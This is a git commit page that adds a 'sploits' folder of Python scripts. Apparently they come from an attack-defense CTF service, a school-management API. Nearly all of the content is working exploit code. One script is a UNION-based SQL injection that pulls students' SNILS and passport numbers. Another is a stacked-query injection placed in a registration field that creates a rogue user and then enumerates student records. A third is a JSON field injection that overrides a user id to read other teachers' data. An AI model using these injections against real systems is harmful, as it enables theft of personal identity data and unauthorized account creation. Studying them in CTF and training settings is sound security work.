greenhaze/srab
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

init here

Browse Source
This commit is contained in:
Тимофей Гуленок
2025-11-26 21:32:41 +03:00
commit 33c97acade
91 changed files with 9155 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

38
sploits/01_sql_bad_escape.py Normal file
View File

@@ -0,0 +1,38 @@
#!/usr/bin/env python3
import socket
import common
credentials = common.register_random_teacher()
headers = common.get_auth_headers(credentials)
class_id = common.create_class(credentials)
injection = (
"01%2F01%2F2077' "
"' UNION SELECT id AS id, user_id AS class_id, snils AS date, "
"passport AS title, 'gotcha' AS homework FROM students "
"WHERE '-1' = '-1"
)
path = f"/api/classes/{class_id}/lessons/{injection}"
url = common.BASE + path
s = socket.create_connection((common.HOST, common.PORT))
s.sendall(f"""GET {path} HTTP/1.1
Authorization: {headers["Authorization"]}
""".encode("utf-8"))
chunks = []
while True:
data = s.recv(4096)
if not data:
break
chunks.append(data)
body = b"".join(chunks).decode("utf-8")
print(body)

38
sploits/02_sql_no_escape.py Normal file
View File

@@ -0,0 +1,38 @@
#!/usr/bin/env python3
import requests
import common
injection_first_name = common.random_string()
injection_last_name = common.random_string()
injection_password = common.random_string()
injection_username = f"{injection_first_name}.{injection_last_name}"
legit_first_name = common.random_string()
legit_last_name = common.random_string()
legit_password = common.random_string()
legit_username = f"{legit_first_name}.{legit_last_name}"
legit_education = (
"Pony', ''); INSERT INTO users (first_name, last_name, middle_name, "
"username, password) "
f"VALUES ('{injection_first_name}', '{injection_last_name}', "
f"'Injectionovich', '{injection_username}', "
f"'{injection_password}'); --"
)
common.register_teacher(
legit_first_name,
legit_last_name,
legit_password,
legit_username,
legit_education,
)
last_student_id = common.create_student((legit_username, legit_password))
headers = common.get_auth_headers((injection_username, injection_password))
for student_id in range(max(1, last_student_id - 100), last_student_id):
url = f"{common.BASE}/api/students/{student_id}"
response = requests.get(url, headers=headers)
print(response.text)

44
sploits/03_json_injection.py Normal file
View File

@@ -0,0 +1,44 @@
#!/usr/bin/env python3
import socket
import common
first_name = common.random_string()
last_name = common.random_string()
password = common.random_string()
username = f"{first_name}.{last_name}"
_, _, base_teacher_id = common.register_random_teacher()
common.register_teacher(
first_name,
last_name,
password,
username,
middle_name="""Injectionovich", "id": 228, "kek": "pek"""
)
for teacher_id in range(max(1, base_teacher_id - 100), base_teacher_id):
path = f"/api/students?учитель={teacher_id}"
headers = common.get_auth_headers((username, password))
s = socket.create_connection((common.HOST, common.PORT))
s.sendall(f"""GET {path} HTTP/1.1
Authorization: {headers["Authorization"]}
""".encode("utf-8"))
chunks = []
while True:
data = s.recv(4096)
if not data:
break
chunks.append(data)
body = b"".join(chunks).decode("utf-8")
print(body)

118
sploits/common/__init__.py Normal file
View File

@@ -0,0 +1,118 @@
import json
import random
import sys
import requests
HOST = sys.argv[1]
PORT = 1337
BASE = f"http://{HOST}:{PORT}"
def random_string(length=8):
letters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
return ''.join(random.choice(letters) for _ in range(length))
def register_teacher(
first_name,
last_name,
password,
username,
education="Pony",
middle_name="Автотестович",
):
url = f"{BASE}/api/users"
data = {
"имя": first_name,
"фамилия": last_name,
"отчество": middle_name,
"образование": education,
"пароль": password,
"повтор пароля": password,
}
response = requests.post(url, data=json.dumps(data, ensure_ascii=False))
if response.status_code != 201:
print(
f"Failed to register teacher: {response.status_code} "
f"{response.text}"
)
sys.exit(1)
data = response.json()
return (username, password, data["идентификатор"])
def register_random_teacher():
first_name = random_string()
last_name = random_string()
password = random_string()
username = f"{first_name}.{last_name}"
return register_teacher(first_name, last_name, password, username)
def create_class(teacher_credentials):
headers = get_auth_headers(teacher_credentials)
url = f"{BASE}/api/classes"
data = {
"номер": 11,
"буква": "Б",
}
response = requests.post(
url,
data=json.dumps(data, ensure_ascii=False),
headers=headers
)
if response.status_code != 201:
print(
f"Failed to create class: {response.status_code} {response.text}"
)
sys.exit(1)
class_info = response.json()
return class_info["идентификатор"]
def create_student(teacher_credentials):
headers = get_auth_headers(teacher_credentials)
password = random_string()
url = f"{BASE}/api/students"
data = {
"имя": random_string(),
"фамилия": random_string(),
"отчество": "Автотестович",
"снилс": random_string(),
"паспорт": random_string(),
"пароль": password,
"повтор пароля": password,
}
response = requests.post(
url,
data=json.dumps(data, ensure_ascii=False),
headers=headers
)
if response.status_code != 201:
print(
f"Failed to create student: {response.status_code} {response.text}"
)
sys.exit(1)
class_info = response.json()
return class_info["идентификатор"]
def get_auth_headers(teacher_credentials):
return {
"Authorization": (
f"Basic {teacher_credentials[0]} {teacher_credentials[1]}"
)
}